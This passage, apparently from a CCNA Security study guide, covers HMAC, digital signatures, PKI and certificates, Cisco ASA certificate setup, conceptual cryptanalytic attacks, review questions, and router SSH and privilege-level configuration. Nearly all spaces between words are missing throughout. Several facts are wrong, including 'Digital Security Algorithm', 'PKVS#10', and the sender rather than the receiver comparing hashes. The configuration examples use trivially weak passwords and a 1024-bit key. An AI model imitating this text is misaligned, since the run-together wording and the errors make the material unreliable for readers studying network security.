HMACAhashMAC(HMAC)isakeyed-hashMessageAuthenticationCode(MAC)thatinvolvesahashfunctionwithsymmetrickey.HMACprovidesdataintegrityandauthentication.AnyofthepreviouslylistedhashfunctionscanbeusedwithHMAC,withtheHMACnamebeingappendedwiththehashfunctionname,asinHMAC-SHA-1.ThestrengthofHMACisdependentuponthestrengthofthehashfunction,includingthehashvaluesizeandthekeysize.
HMAC’shashvalueoutputsizewillbethesameastheunderlyinghashfunction.HMACcanhelptoreducethecollisionrateofthehashfunction.Figure3.6showsthebasicstepsofanHMACprocess.
FIGURE3.6HMACprocess
DigitalSignaturesAdigitalsignatureisahashvalueencryptedwiththesender’sprivatekey.Adigitalsignatureprovidesauthentication,nonrepudiation,andintegrity.Ablindsignatureisaformofdigitalsignaturewherethecontentsofthemessagearemaskedbeforeitissigned.Figure3.7showstheprocess.
FIGURE3.7Digitalsignatureprocess
Theprocessforcreatingadigitalsignatureisasfollows:
1. Thesignerobtainsahashvalueforthedatatobesigned.
2. Thesignerencryptsthehashvalueusinghisprivatekey.
3. Thesignerattachestheencryptedhashandacopyofhispublickeyinacertificatetothedataandsendsthemessagetothereceiver.
Theprocessforverifyingthedigitalsignatureisasfollows:
1. Thereceiverseparatesthedata,encryptedhash,andcertificate.
2. Thereceiverobtainsthehashvalueofthedata.
3. ThereceiververifiesthatthepublickeyisstillvalidusingthePKI.
4. Thereceiverdecryptstheencryptedhashvalueusingthepublickey.
5. Thereceivercomparesthetwohashvalues.Ifthevaluesarethesame,themessagehasnotbeenchanged.
Publickeycryptography,whichisdiscussedlaterinthischapter,isusedtocreatedigitalsignatures.Usersregistertheirpublickeyswithacertificationauthority(CA),whichdistributesacertificatecontainingtheuser’spublickeyandtheCA’sdigitalsignature.Thedigitalsignatureiscomputedbytheuser’spublickeyandvalidityperiodbeingcombinedwith
thecertificateissueranddigitalsignaturealgorithmidentifier.
TheDigitalSignatureStandard(DSS)isafederaldigitalsecuritystandardthatgovernstheDigitalSecurityAlgorithm(DSA).DSAgeneratesamessagedigestof160bits.TheU.S.federalgovernmentrequirestheuseofDSA,RSA,orEllipticCurveDSA(ECDSA)andSHAfordigitalsignatures.
DSAisslowerthanRSAandprovidesonlydigitalsignatures.RSAprovidesdigitalsignatures,encryption,andsecuresymmetrickeydistribution.
KeyExchangeAsyouhavelearned,symmetrickeyalgorithmsaresignificantlymoreefficientatencryptinganddecryptingdatathanareasymmetricalgorithms.However,thebestwaytoillustratethehybridcryptosystemistoexplorethefunctionofSSH.
Application:SSHSecureShell(SSH)isanapplicationandprotocolthatisusedtoremotelylogintoanothercomputerusingasecuretunnel.Afterasessionkeyisexchangedandasecurechannelisestablished,allcommunicationbetweenthetwocomputersisencryptedoverthesecurechannel.SSHisasolutionthatcouldbeusedtoremotelyaccessdevices,includingswitches,routers,andservers.
SSHoffersagoodillustrationoftheuseofasymmetricalgorithmstogenerateandexchangeasymmetrickeyandthereaftertousethatkeyfordataencryption.Thestepsareasfollows:
1. Theclientconnectstotheserver,andtheserverpresentsitspublickeytotheclient.
2. Theclientandservernegotiateagroupofsettingsthatmustmatchonbothends.Itincludesthesymmetricalgorithmtheywilluse.
3. Theclientcreatesarandomsessionkeyandencryptsitwiththeserver’spublickey.
4. Theclientsendsthisencryptedsessionkeytotheserver,andtheserverdecryptsitusingitsprivatekey.
Usingthesymmetrickey,whichtheybothnowpossess,thetwostartencryptingeverythingthatgoesonfromthispoint,includingtheauthenticationprocess.
PublicKeyInfrastructureApublickeyinfrastructure(PKI)includessystems,software,andcommunicationprotocolsthatdistribute,manage,andcontrolpublickeycryptography.APKIpublishesdigitalcertificates.BecauseaPKIestablishestrustwithinanenvironment,aPKIcancertifythatapublickeyistiedtoanentityandverifythatapublickeyisvalid.Publickeysarepublishedthroughdigitalcertificates.
TheX.509standardisaframeworkthatenablesauthenticationbetweennetworksandovertheInternet.APKIincludestimestampingandcertificaterevocationtoensurethatcertificatesaremanagedproperly.APKIprovidesconfidentiality,messageintegrity,authentication,andnonrepudiation.
ThestructureofaPKIincludesCAs,certificates,registrationauthorities,certificaterevocationlists,andcross-certification.ThissectiondiscussesthesePKIcomponentsaswellasafewotherPKIconcepts.
PublicandPrivateKeysInpublickeycryptography,twokeysareused,apublickeyandaprivatekey.Thesetwokeysarenotthesame,buttheyaremathematicallyrelatedinsuchawaythatifyouencryptdatawithoneofthem,youcandecryptitwiththeother.Usersanddevicesareissuedpublic/privatekeypairsthatareboundtoadigitaldocumentcalledadigitalcertificate.Thiscertificate(morespecificallythekeystowhichitisbound)canbeusedforavarietyofthingsincludingthefollowing:
Encryptingdata
Asaformofauthentication
Encryptingemail
Digitallysigningsoftware
PrivateKeyTheprivatekeythatisgeneratedaspartofthekeypairismadeavailableonlytotheuserordevicetowhichitwasissued.Thiskeymaybestoredonsoftwareintheuser’scomputer,oritmightbestoredonasmartcardifitistobeusedforauthentication.Atanyrate,thekeyconcepthereisthatitisavailableonlytotheuserordevicetowhichitwasissued.
PublicKeyThepublickeythatisgeneratedaspartofthekeypairismadeavailabletoanyonetowhomthecertificateispresentedbecauseitispartoftheinformationcontainedinthisdigitaldocument.Insomecases,publickeysmaybekeptinarepositorysotheycanberequestedbyanentityifrequired.Regardlessofthemethodusedtoobtainthepublickey,thekeyconcepthereisthatitisavailabletoanyone.
PuttingItTogetherThesekeysworktogethertoperformbothencryptionanddigitalsignatures.Toprovideencryption,thedataisencryptedwiththereceiver’spublickey,whichresultsinciphertextthatonlythereceiver’sprivatekeycandecrypt.Figure3.8showsthisprocess.
FIGURE3.8PKIencryption
Todigitallysignadocument,thesendercreateswhatiscalledahashvalueofthedatabeingsent,encryptsthatvaluewiththesender’shisprivatekey,andsendsthisvaluealongwiththemessage.Thereceiverdecryptsthehashusingthesender’spublickey.Thereceiverthen,usingthesamehashingalgorithm,hashesthemessage.Thesenderthencomparesthedecryptedhashvaluetotheonejustgenerated.Iftheyarethesame,thesignature(andtheintegrityofthedata)hasbeenverified.Figure3.9showsthisprocess.
FIGURE3.9PKIdigitalsignature
CertificatesAdigitalcertificateprovidesanentity,usuallyauser,withthecredentialstoproveitsidentityandassociatesthatidentitywithapublickey.Atminimum,adigitalcertificationmustprovidetheserialnumber,theissuer,thesubject(owner),andthepublickey.
AnX.509certificatecomplieswiththeX.509standard.AnX.509certificatecontainsthefollowingfields:
Version
SerialNumber
AlgorithmID
Issuer
Validity
Subject
SubjectPublicKeyInfo
PublicKeyAlgorithm
SubjectPublicKey
IssuerUniqueIdentifier(optional)
SubjectUniqueIdentifier(optional)
Extensions(optional)
RevocationCertificateshaveadefinedlifetime.Whenthevalidityperiodends,thecertificatemustberenewedtocontinuetobevalid.Therearecaseswhenacertificatemustberevokedbeforeitslifetimeends.Reasonsforcertificaterevocationincludethefollowing:
Compromiseoftheassociatedkeys
Improperissuance
CompromiseoftheissuingCA
Ownerofthecertificatenolongerowningthedomainforwhichitwasissued
Ownerofthecertificateceasingoperationsentirely
Originalcertificatebeingreplacedwithadifferentcertificatefromadifferentissuer
Acertificaterevocationlist(CRL)isalistofdigitalcertificatesthataCAhasrevoked.Tofindoutwhetheradigitalcertificatehasbeenrevoked,eitherthebrowsermustchecktheCRLortheCAmustpushouttheCRLvaluestoclients.ThiscanbecomequitedauntingwhenyouconsiderthattheCRLcontainseverycertificatethathaseverbeenrevoked.
Oneconcepttokeepinmindistherevocationrequestgraceperiod.ThisperiodisthemaximumamountoftimebetweenwhentherevocationrequestisreceivedbytheCAandwhentherevocationactuallyoccurs.Ashorterrevocationperiodprovidesbettersecuritybutoftenresultsinahigherimplementationcost.
UsesCertificatescanbeusedforvarietyofoperations.Thiscanincludeauthentication,encryption,digitalsignatures,andemailtonameafew.VeriSignfirstintroducedthefollowingdigitalcertificateclasses:
Class1:Forindividualsintendedforemail.Thesecertificatesgetsavedbywebbrowsers.
Class2:Fororganizationsthatmustprovideproofofidentity.
Class3:ForserversandsoftwaresigninginwhichindependentverificationandidentityandauthoritycheckingisdonebytheissuingCA.
Class4:Foronlinebusinesstransactionsbetweencompanies.
Class5:Forprivateorganizationsorgovernmentalsecurity.
Application:SSL/TLSCertificatesareoftenusedwhenusingSSL/TLS.MostmodernsystemstodayuseTLS,butthe
termSSLisoftenstillusedtorefertotheconnection.SSLisusedtoprotectmanytypesofapplications,themostcommonbeingHTTPS(asHTTPiscalledwhenusedwithSSL).
AnSSLsessionisformedbetweenawebserverandthewebbrowseroftheclient.Figure3.10depictstheprocess.
CertificateAuthoritiesAcertificationauthority(CA)istheentitythatcreatesandsignsdigitalcertificates,maintainsthecertificates,andrevokesthemwhennecessary.EveryentitythatwantstoparticipateinthePKImustcontacttheCAandrequestadigitalcertificate.ItistheultimateauthorityfortheauthenticityforeveryparticipantinthePKIandsignseachdigitalcertificate.Thecertificatebindstheidentityoftheparticipanttothepublickey.
Anyparticipantthatrequestsacertificatemustfirstgothroughtheregistrationauthority(RA),whichverifiestherequestor’sidentityandregisterstherequestor.Aftertheidentityisverified,theRApassestherequesttotheCA.Inmanycases,theCAandtheRAarethesameserver.
TherearedifferenttypesofCAs.OrganizationsexistthatprovideaPKIasapayableservicetocompaniesthatneedthem.AnexampleisVeriSign.SomeorganizationsimplementtheirownprivateCAssothattheorganizationcancontrolallaspectsofthePKIprocess.Ifanorganizationislargeenough,itmightneedtoprovideastructureofCAs,withtherootCAbeingthehighestinthehierarchy.
BecausemorethanoneentityisofteninvolvedinthePKIcertificationprocess,certificationpathvalidationallowstheparticipantstocheckthelegitimacyofthecertificatesinthecertificationpath.
WhenimplementingaPKI,mostorganizationsrelyonahierarchicalchain-of-trustmodelthatusesthreecomponentsatminimum:certificateauthorities(CAs),registrationauthorities(RAs),andacentraldirectory/distributionmanagementmechanism.
FIGURE3.10SSLprocess
ACAissuescertificatesthatbindapublickeytoaspecificdistinguishedname(DN)issuedtothecertificateapplicant(user).Beforeissuingacertificate,however,theCAvalidatestheapplicant’sidentity.
Whenasubject’spubliccertificateisreceived,thesystemmustverifyitsauthenticity.Becausethecertificateincludestheissuer’sinformation,theverificationprocesscheckstoseewhetheritalreadyhastheissuer’spubliccertificate.Ifnot,itmustretrieveit.
ArootCAisatthetopofthecertificatesigninghierarchy.VeriSign,Comodo,andEntrustareexamplesofpublicrootCAs.FororganizationsthatmaintaintheirownPKI,thefirstCAcreatedwillbetherootCA.
Usingtherootcertificate,thesystemverifiestheissuersignatureandensuresthatthesubjectcertificateisnotexpiredorrevoked.Ifverificationissuccessful,thesystemacceptsthesubjectcertificateasvalid.
RootCAscandelegatesigningauthoritytootherentities.TheseentitiesareknownasintermediateCAs.IntermediateCAsaretrustedonlyifthesignatureontheirpublickeycertificateisfromarootCAorcanbetraceddirectlybacktoaroot.BecausearootCAcandelegatetointermediateCAs,alengthychainoftrustcanexist.
Anysystemreceivingasubjectcertificatecanverifyitsauthenticitybysteppingupthechainoftrusttotheroot.
PKIStandardsPublicKeyCryptographyStandards(PKCS)werecreatedbyRSASecurity.WhiletheywerecreatedtohelppromotetechniquesforwhichRSAhadpatents,manyofthesestandardshavebecomestandardsbytheIETF.Table3.2showsthestandardsthathavenotsincebeenabandonedorobsoleted.
TABLE3.2PKIstandards
Standard Version Name DescriptionPKCS#1 2.2 RSA
CryptographyStandard
DefinesthemathematicalpropertiesandformatofRSApublicandprivatekeysandthebasicalgorithmsandencoding/paddingschemesforperformingRSAencryptionanddecryptionandforproducingandverifyingsignatures.
PKCS#3 1.4 Diffie-HellmanKeyAgreementStandard
Acryptographicprotocolthatallowstwopartiesthathavenopriorknowledgeofeachothertojointlyestablishasharedsecretkeyoveraninsecurecommunicationschannel.
PKCS#5 2.0 Password-BasedEncryptionStandard
Providesrecommendationsfortheimplementationofpassword-basedcryptography,coveringkeyderivationfunctions,encryptionschemes,message-authenticationschemes,andASN.1syntaxidentifyingthetechniques.
PKCS#7 1.5 CryptographicMessageSyntaxStandard
Usedtosignand/orencryptmessagesunderaPKI.FormedthebasisforS/MIME.Oftenusedforsinglesign-on.
PKCS#8 1.2 Private-KeyInformationSyntaxStandard
Usedtocarryprivatecertificatekeypairs(encryptedorunencrypted).
PKCS#9 2.0 SelectedAttributeTypes
DefinesselectedattributetypesforuseinPKCS#6extendedcertificates,PKCS#7digitallysignedmessages,PKCS#8private-keyinformation,andPKCS#10certificate-signingrequests.
PKVS#10
1.7 CertificationRequestStandard
Formatofmessagessenttoacertificationauthoritytorequestcertificationofapublickey.
PKCS#11
2.4 CryptographicTokenInterface
AlsoknownasCryptoki.AnAPIdefiningagenericinterfacetocryptographictokens(seealsohardwaresecuritymodule).Oftenusedinsinglesign-on,public-keycryptographyanddiskencryption.
PKCS#12
1.1 PersonalInformationExchangeSyntaxStandard
Definesafileformatcommonlyusedtostoreprivatekeyswithaccompanyingpublickeycertificates,protectedwithapassword-basedsymmetrickey.
PKCS#15
1.1 CryptographicTokenInformationFormatStandard
Definesastandardallowingusersofcryptographictokenstoidentifythemselvestoapplications,independentoftheapplication’sCryptokiimplementation(PKCS#11)orotherAPI.
PKITopologiesAPKIcanconsistofasingleserverthatoperatesasRAandCAandistherootcertificateserver.Butinverylargeenvironments,youmaybeadvisedtocreateahierarchyofCAs.Whenthisisdone,asingleCAwillbetherootCAandthetopofthehierarchy.UnderneaththiswouldbeanumberofsubordinateCAsthatactuallyissuethecertificatestotheentities.TherootCAcreatesandsignsthecertificatesofthesubordinateCAs,whichcreatesatrustpathuptotheroot.Figure3.11showsthisarrangement.
FIGURE3.11PKIhierarchy
Insomecases,twoorganizationsmayhaveaneedtotrustoneanother’scertificates.Thiscan
bedonebyconfiguringcrosscertification.Incrosscertification,atrustiscreatedbetweenthetworootCAs,whichenablebothsystemstotrustallcertificates,asshowninFigure3.12.
FIGURE3.12Crosscertification
CertificatesintheASATheCiscoAdaptiveSecurityAppliance(ASA)makesuseofcertificatesandtheassociatedkeystoprotecttheconnectionoftheadministratortotheASAusingtheAdaptiveSecurityDeviceManager(ADSM)andtosupportSSLVPNclients.Inthissection,you’lllearnaboutthedefaultcertificatethatispresentintheASA,theprocessofaddingacertificateandviewingthecertificatesthatarepresent,andtheuseoftheSimpleCertificateEnrollmentProtocol(SCEP).
DefaultCertificateTheASAhasaself-signeddefaultcertificatethatcanbeusedfortheoperationslistedintheprevioussection.Theissuewithaself-signedcertificateisthatnobrowsersordeviceswillhavetheASAlistedasatrustedCA.Becauseofthis,anyHTTPSconnectionstotheASAwillgenerateawarningmessagethatthecertificatebeingpresentedisnottrusted.Toavoidthisissue,youcaninstallarootcertificateoftheCAwhosecertificateisfoundinthebrowsersanddevicesthatwillinteractwiththeASA(eitherthatyouownorapublicCA).
ViewingandAddingCertificatesintheASDMToviewthecurrentcertificatesintheADSM,selectConfigurationatthetopoftheADSMconsoleandDeviceManagementfromthetabsontheleftsideoftheconsole,asshowninFigure3.13.Asyoucansee,thisASAcurrentlyhasnocertificatesinstalledotherthanthedefault.
FIGURE3.13Viewingcertificates
Toaddacertificate,followthesesteps:
1. IntheCiscoASDMConfigurationTool,selectConfiguration DeviceManagementCertificateManagement CACertificates.
2. ClickAdd.TheInstallCertificatedialogboxappears.Youhavethreeoptions:installfromafile,pastetheinformation,oruseSCEP.IftherootCArepresentedbytherootcertificatesupportsSCEP,choosethatoption.Otherwise,usethenexttwosteps.
3. Enteratrustpointnameorusethedefaultnamethatappearsinthebox.
4. ClicktheInstallFromAFileradiobuttonandbrowsetothelocationoftheRoot.crtfilethatyouareinstalling.
5. ClicktheMoreOptionsbutton,andhereyoucanconfigurehowcertificaterevocationwillbechecked,theprotocolstobeusedforcertificateverification,andothersettings.
SCEPSimpleCertificateEnrollmentProtocolisaprotocolusedforenrollmentandotherPKIoperations.ItissupportedonmostCiscodevices.Itsimplifiestheprocessofobtainingand
installingboththerootandtheidentitycertificates.TheprocesstouseSCEPisasfollows:
1. ChooseConfiguration DeviceManagement CertificateManagement IdentityCertificatesandclickAdd.
2. ClicktheAddANewIdentityCertificateradiobuttonandclicktheAdvancedbutton.
3. IntheAdvancedbox,ontheEnrollmentModetab,selectRequestFromACAandthenentertheIPaddressoftheCAthatsupportsSCEP.ClickOK.
4. IntheAddANewIdentityCertificatedialogbox,selectAddCertificate.Iftheenrollmentissuccessful,youwillreceiveanEnrollmentSucceededmessage.
CryptanalysisIncryptanalysis,cryptographyattacksarecategorizedaseitherpassiveoractiveattacks.Apassiveattackisusuallyimplementedjusttodiscoverinformationandismuchhardertodetectbecauseitisusuallycarriedoutbyeavesdroppingorpacketsniffing.Activeattacksinvolveanattackeractuallycarryingoutsteps,suchasmessagealterationorfilemodification.Cryptographyisusuallyattackedviathekey,algorithm,execution,data,orpeople.Butmostoftheseattacksareattemptingtodiscoverthekeyused.
Ciphertext-OnlyAttackInaciphertext-onlyattack,anattackerusesseveralencryptedmessages(ciphertext)tofigureoutthekeyusedintheencryptionprocess.Althoughitisacommontypeofattack,itisusuallynotsuccessfulbecausesolittleisknownabouttheencryptionused.
KnownPlaintextAttackInaknownplaintextattack,anattackerusestheplaintextandciphertextversionsofamessagetodiscoverthekeyused.Thistypeofattackimplementsreverseengineering,frequencyanalysis,orbruteforcetodeterminethekeysothatallmessagescanbedeciphered.
ChosenPlaintextAttackInachosenplaintextattack,anattackerchoosestheplaintexttogetencryptedtoobtaintheciphertext.Theattackersendsamessagehopingthattheuserwillforwardthatmessageasciphertexttoanotheruser.Theattackercapturestheciphertextversionofthemessageandtriestodeterminethekeybycomparingtheplaintextversionheoriginatedwiththecapturedciphertextversion.Onceagain,keydiscoveryisthegoalofthisattack.
ChosenCiphertextAttackAchosenciphertextattackistheoppositeofachosenplaintextattack.Inachosenciphertextattack,anattackerchoosestheciphertexttobedecryptedtoobtaintheplaintext.Thisattackismoredifficultbecausecontrolofthesystemthatimplementsthealgorithmisneeded.
BruteForce
Aswithabrute-forceattackagainstpasswords,abrute-forceattackexecutedagainstacryptographicalgorithmusesallpossiblekeysuntilakeyisdiscoveredthatsuccessfullydecryptstheciphertext.Thisattackrequiresconsiderabletimeandprocessingpowerandisdifficulttocomplete.
BirthdayAttackAbirthdayattackusesthepremisethatfindingtwomessagesthatresultinthesamehashvalueiseasierthanmatchingamessageanditshashvalue.Mosthashalgorithmscanresistsimplebirthdayattacks.
Meet-in-the-MiddleAttackInameet-in-themiddleattack,anattackertriestobreakthealgorithmbyencryptingfromoneendanddecryptingfromtheothertodeterminethemathematicalproblemused.
SummaryInthischapter,youlearnedaboutsymmetricandasymmetrickeycryptographyandhowtheydiffer.Thechaptergaveexamplesofeachtypeofalgorithm,andyoulearnedhowtheycanworktogetherinahybridsystem.Youalsolearnedaboutthehashingprocessandlookedatthemajorhashingalgorithms.TherewascoverageofPKIandthecomponentsthatmakeitfunction.Finally,youlearnedaboutcommonattacksoncryptography.
ExamEssentialsDifferentiatebetweensymmetricandasymmetrickeycryptography.Thisincludesthetypesofkeysused,thescenariosinwhichtheyareused,andthedisadvantagesandadvantagesofeach.
Describethehashingprocess.Thisincludeshowhashingalgorithmswork,examplesofhashingalgorithms,andtheroleofhashingindigitalsignatures.
ExplaintheroleofaPKI.DescribethecomponentsofaPKI,thecertificateenrollmentprocess,andtheuseofpublicandprivatekeysintheprocess.
Definecryptanalyticattacks.Theseincludeciphertext-onlyattack,chosenplaintext,chosenciphertext,bruteforce,birthday,andmeet-in-the-middle.
ReviewQuestions1. Whichofthefollowingisnottrueofsymmetricalgorithms?
A. Theyuseapublickey.
B. Theyarefasterthanasymmetricalgorithms.
C. Theypresentkeyexchangeissues.
D. Theyaretypicallyusedfordataatrest.
2. Whichofthefollowingisnottrueofasymmetricalgorithms?
A. Theyprovideautomatickeyexchange.
B. Theyaretypicallyusedfordataatrest.
C. Theyuseaprivateandpublickey.
D. Theyareslowerthansymmetricalgorithms.
3. Whichofthefollowingisnotanadvantageofblockciphers?
A. Theimplementationiseasierthanstream-basedcipherimplementation.
B. Generallytheyarelesssusceptibletosecurityissues.
C. Generallytheyareusedmoreinsoftwareimplementations.
D. Theyemployonlysubstitution.
4. Whichofthefollowingciphersperformencryptiononabit-by-bitbasis?
A. Block
B. Stream
C. Asymmetric
D. Polyalphabetic
5. Whichofthefollowingisusedtoensurethatpatternsarenotproducedduringencryption?
A. IVs
B. HMAC
C. RC4
D. Salting
6. InwhichofthefollowingmodesofDESisevery64-bitblockencryptedwiththesamekey?
A. CBC
B. ECB
C. ECC
D. CFB
7. Whichofthefollowingisthereplacementalgorithmfor3DES?
A. Blowfish
B. AES
C. IDEA
D. RC4
8. Whichofthefollowingisthemostpopularasymmetricalgorithm?
A. RSA
B. ElGamal
C. DSA
D. ECC
9. Whichofthefollowingoccurswhenahashfunctionproducesthesamehashvalueondifferentmessages?
A. Birthdayattack
B. Keyexposure
C. Collision
D. Substitution
10. WhichofthefollowinghashingalgorithmsisrequiredbytheU.S.government?
A. MD4
B. MD5
C. SHA1
D. SHA2
11. Whichofthefollowingcanhelptoreducethecollisionrateofthehashfunction?
A. MAC
B. HMAC
C. Digitalsignatures
D. Substitution
12. Whichofthefollowingisahashvalueencryptedwiththesender’sprivatekey?
A. Salt
B. Nonce
C. Digitalsignature
D. HMAC
13. Whichofthefollowingistrueofahybridcryptosystem?
A. Asymmetricalgorithmsareusedforthekeyexchange.
B. Symmetrickeysareusedforthekeyexchange.
C. Asymmetrickeysareusedforthedataencryption.
D. Asymmetrickeysareexchangeautomatically.
14. Whichofthefollowingisadigitaldocumentbindingakeypairtoanentity?
A. Certificate
B. Nonce
C. Salt
D. IV
15. Whichofthefollowingisthestandardfordigitalcertificates?
A. X.500
B. X.509
C. IEEE509
D. RFC500
16. WhichofthefollowingisalistofdigitalcertificatesthataCAhasrevoked?
A. OSCP
B. CRL
C. SCEP
D. REVC
17. Whichofthefollowingcertificateclassesisforindividualsintendedforemail?
A. 1
B. 2
C. 3
D. 4
18. WhichofthefollowingPKIcomponentsverifiestherequestor’sidentity?
A. CA
B. RA
C. DN
D. CN
19. WhichofthefollowingcanbeusedtoallowonerootCAtotrustanotherrootCA’s
certificates?
A. Subordination
B. Crosscertification
C. Certlink
D. Trust
20. WhattypeofcertificatedoestheASAuseoutofthebox?
A. Public
B. Self-signed
C. Globallytrusted
D. Locallytrusted
Chapter4SecuringtheRoutingProcessCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
4.1SecurityonCiscorouters
Configuremultipleprivilegelevels
ConfigureCiscoIOSrole-basedCLIaccess
ImplementCiscoIOSresilientconfiguration
4.2Securingroutingprotocols
ImplementroutingupdateauthenticationonOSPF
4.3Securingthecontrolplane
Explainthefunctionofcontrolplanepolicing
Toprovidesecureroutingandswitching,theroutersandswitchesthemselvesmustbesecured.Leavingtheminavulnerablestatecanrenderallothersecurityimplementationsuselessbecauseunauthorizedaccesscanallowamaliciousindividualtoalterallthesecuritysettingsthatareinplace.Additionally,whenroutersareexchangingroutingupdates,anyunauthenticatedupdatescanrevealimportantinformationaboutyournetworktoanyonewhoconvincesyourroutertoperformaroutingupdate.Inthischapter,youwillexplorefunctionalityyoushouldtakeadvantageoftosecureaccesstothedevices,tosecureroutingupdates,andtosecurethecontrolplane.
Inthischapter,youwilllearnthefollowing:
SecuringCiscorouters
Securingroutingprotocols
SecuringRouterAccessSecuringadministrativeaccesstotherouteristhefirststepinsecuringtheroutingprocess.Thispreventsunauthorizedaccesstotherouter,whichwillensurethattheconfigurationoftheroutercannotbealtered.Inthissection,you’lllearnaboutconfiguringsecureadministrative
accessusingseveraltools.
FirstI’lldiscusshowtoconfigureanencryptedsessionwiththerouterusingSSHratherthanTelnet(whichtransmitsincleartext).NextI’lltalkaboutcontrollingtheoperationsofeachindividualtechnicianbyassigningprivilegelevels.Asprivilegelevelsdonotmeettheneedsofallenvironments,you’llalsolookatawaytogetmoregranularwiththeassignmentoftasksbyauthorizingfunctionsviaacommand-lineinterface(CLI)withrole-basedCLI.Finally,I’lldiscusshowtoprotecttheconfigurationoftherouterusingtheCiscoIOSresilientconfigurationfeature.
ConfiguringSSHAccessWhileTelnetcancertainlybeusedtomanagearouter,thisremoteaccesstechnologytransmitseverythingincleartext,makingitunsuitableintoday’senvironments.Forthisreason,youshouldalwaysuseSecureShell(SSH)forsecureremoteaccess.TheSSHserverontherouterwillrequireanRSApublic/privatekeypairtouseintheprocessofencryptingthetraffic.Itcangeneratethiskeypairbutmusthavecertaininformationconfiguredbeforeitcandosobecauseitusesthisinformationasthelabelforthekeypair.
Therefore,thehigh-levelstepstosetupSSHareasfollows:
1. Settheroutername.
2. Settherouterdomainname.
3. GeneratetheRSAkey.
Herearetheactualcommands:
Router(config)#hostnameR63
R63(config)#ipdomain-namemcmillan.com
R63(config)#cryptokeygeneratersa?
encryptionGenerateageneralpurposeRSAkeypairforsigningand
encryption
exportableAllowthekeytobeexported
general-keysGenerateageneralpurposeRSAkeypairforsigningand
encryption
labelProvidealabel
modulusProvidenumberofmodulusbitsonthecommandline
oncreatekeyonspecifieddevice.
redundancyAllowthekeytobesyncedtohigh-availabilitypeer
signatureGenerateageneralpurposeRSAkeypairforsigningand
encryption
storageStorekeyonspecifieddevice
usage-keysGenerateseparateRSAkeypairsforsigningandencryption
R63(config)#cryptokeygeneratersamodulus1024
Thenameforthekeyswillbe:R63.mcmillan.com
%Thekeymodulussizeis1024bits
%Generating1024bitRSAkeys,keyswillbenon-exportable...
[OK](elapsedtimewas2seconds)
R63(config)#
*Mar2818:32:09.095:%SSH-5-ENABLED:SSH1.99hasbeenenabled
Inthesesteps,youcanseeIcreatedaname,R63;setthedomainnametomcmillan.com;andgeneratedakey.ThemoduluskeywordIusedsetsthelengthofthekey,whichinthiscaseis1,024bits.NoticethesyslogmessagethatindicatesSSHversion1.99hasbeenenabled.Thisindicatesitisaversion2server,whichcanacceptconnectionsfromSSHversion1devices.
Nextyouneedtodothefollowing:
1. CreateausernameandpasswordforeachuserwhoneedsSSHaccess.
2. ConfigurelinevtytoonlyacceptSSHconnections.
R63(config)#usernametroysecretmac
R63(config)#linevty?
<0-1114>FirstLinenumber
R63(config)#linevty01114
R63(config-line)#loginlocal
R63(config-line)#transportinputssh
R63(config-line)#
NoticethatIcreatedausernamedtroywithapasswordofmac.Youcancreateasingleaccounttobesharedbyallauthorizedtechniciansandnameitsomethinglikeadmin,oryoucancreateseparateaccountsforeachuser.Separateaccountswillprovideaccountability.
AlsonoticethatwhenIenteredlinevtymode,IcheckedtoseehowmanyvtylinesthisdevicehassothatwhenIrunthecommandtoenterthatmode,thecommandsIapplywillapplytoalllines.Thecommandloginlocaltellstherouterthatalluseraccountswillbefoundlocallyonthisrouterandnotonaremoteserver.That’swhyIneededtocreatethelocalaccountthatIdid.Finally,IsettheroutertoonlyacceptSSHconnectionswiththelastcommand.
ConfiguringPrivilegeLevelsinIOSPrivilegelevelsallowyoutoassignatechniciansetsofactivitiesthatcoincidewiththelevelthetechnicianhasbeenassigned.Thereare16levels,from0to15.Whenyouareinusermode(router>),youareatPrivilegelevel1.Whenyouareinprivilegedmode(router#),youareatlevel15.
Youcanassignlevelsbetween0and15,andbylinkingtheselevelswithcommands,youcancontroltheactivitiesofeachtechnician.ThiscanbedoneonbothIOSdevicesandontheCiscoAdaptiveSecurityAppliance(ASA),althoughthedetailsofeachprocessareslightlydifferent.Privilegelevelsarecreatedattheglobalconfigurationpromptrouter(config)#.Whenaleveliscreated,youalsoaddacommandatthesametime,whichmeansifyouareaddingmultiplecommandstothelevel,youwillruntheprivilegecommandseveraltimes.Oncealeveliscreated,accesstothatlevelisobtainedbyenteringapasswordassignedtothat
level.Fromahighlevel,herearethestepsrequired:
1. Createthelevelandassignacommandtothatlevel.
2. Assignanyadditionalcommandstothelevel.
3. Setapasswordforthelevel.
4. Providethelevelnumberandpasswordtothetechnician(ortechnicians)whowilluseit.
FirstIwillcreatealevelnumbered12,andIwillassigntheshowinterfacescommandtoit.NoticethatwhenIdothis,Ihavetoassignthecommandtothelevelwhereitisusuallyexecuted,inthiscaseprivilegeexeclevel.
router(config)#privilegeexeclevel12showinterfaces
Todemonstratehowtoassignacommandthatisexecutedatadifferentlevel,Iamnowgoingtoaddtheinterfaceconfigurationcommand,andsincethatcommandisexecutednormallyattheglobalconfigurationmode,IwillusetheconfigurekeywordwhenIaddit.
router(config)#privilegeconfigurelevel12interface
MyintentistoallowthistechniciantochangeIPaddressesoninterfaces,soIneedtoassignhimthatcommand.Sincetheipcommand(alongwiththeparameteraddress)isexecutedafterenteringinterfaceconfigurationmode,Ihavetoreferenceinterfaceinthecommand,asshownhere:
router(config)#privilegeinterfacelevel12ip
NowI’mreadytoassignapasswordforlevel12thatIjustcreated.Thatisdonethesamewayanyenablesecretpasswordiscreated,addingtheleveltowhichitappliesasshownnext(otherwiseitwillapplytolevel15asitusuallydoes).ThepasswordIsetiswordpass.
router(config)#enablesecretlevel12wordpass
OnceIprovidethelevelnumberandpasswordtothetechnician,hewillusethepasswordtoentertheprivilegelevelasshownhere,makingitpossibletousethosecommandsandnoothers.Toverifytheapplicationofthelevel,hecantypeshowprivilegeasisalsoshown.
router#enable12
password:wordpass
router#showprivilege
Currentprivilegelevelis12
Ifheattemptstouseanyothercommands,hewillreceivetheerrormessageshownhere:
router#showrun
^
%invalidinputdetectedat‘^’marker.
ConfiguringIOSRole-BasedCLI
Anotheroptionyoucanusetocontroltheoperationsoftechniciansisarole-basedCLI.Usingthisapproach,youcancreateroles,implementedassetsofoperationscalledparserviews.Theonlyviewthatexistsbydefaultiscalledroot,whichasyouwouldexpectallowsaccesstoallcommands.Accesstothisviewisprovidedwhenyousubmittheenablesecretpassword.
